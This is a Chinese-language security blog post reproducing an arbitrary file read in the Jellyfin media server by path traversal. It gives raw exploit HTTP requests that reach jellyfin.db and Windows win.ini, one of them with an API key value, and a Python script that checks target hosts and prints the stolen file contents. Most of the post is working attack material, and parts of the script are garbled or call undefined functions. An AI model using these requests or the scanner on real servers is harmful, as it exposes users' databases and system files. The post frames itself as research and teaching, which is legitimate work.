Jellyfin任意文件读取复现

  • A+
所属分类:安全文章

Jellyfin任意文件读取复现


Jellyfin任意文件读取复现


POC:

GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1GET /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

直接访问POC:

Jellyfin任意文件读取复现

burp:

Jellyfin任意文件读取复现

详细数据:

GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

编写脚本:

Jellyfin任意文件读取复现

脚本:

#!/usr/bin/env python# -*- coding: utf-8 -*-'''name: Jellyfin任意文件读取referer: Jellyfin任意文件读取 IP:port/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/author: thelostworlddescription: Jellyfin任意文件读取。免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!'''import sysimport warningsimport requestsimport clickfrom urllib import parsefrom concurrent.futures import ThreadPoolExecutorimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport random
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
W = '33[0m'G = '33[1;32m'R = '33[1;31m'O = '33[1;33m'B = '33[1;34m'

#随机uadef get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] ) return ua
def run(url): result = ['','不存在'] url = parse.urlparse(url) vulnurl = url.scheme + '://' + url.netloc + '/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/' try: headers = {'User-Agent': get_ua()} req = requests.get(vulnurl,headers=headers,timeout=1,verify=False) if req.status_code == 200 and "font" in req.text and "file" in req.text: result[1] = '存在' result[0] = vulnurl print(result) print(req.text) else: result[1] = '不存在' except: result[1] = '不存在' return result
def main(): _exe.submit(batch)
if __name__ == "__main__": warnings.filterwarnings("ignore") testVuln = run(sys.argv[1])


脚本直接获取:后台回复'Jellyfin'获取


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

Jellyfin任意文件读取复现

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

博客主页:https://www.yuque.com/thelostworld

Jellyfin任意文件读取复现

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Jellyfin任意文件读取复现


本文始发于微信公众号(thelostworld):Jellyfin任意文件读取复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: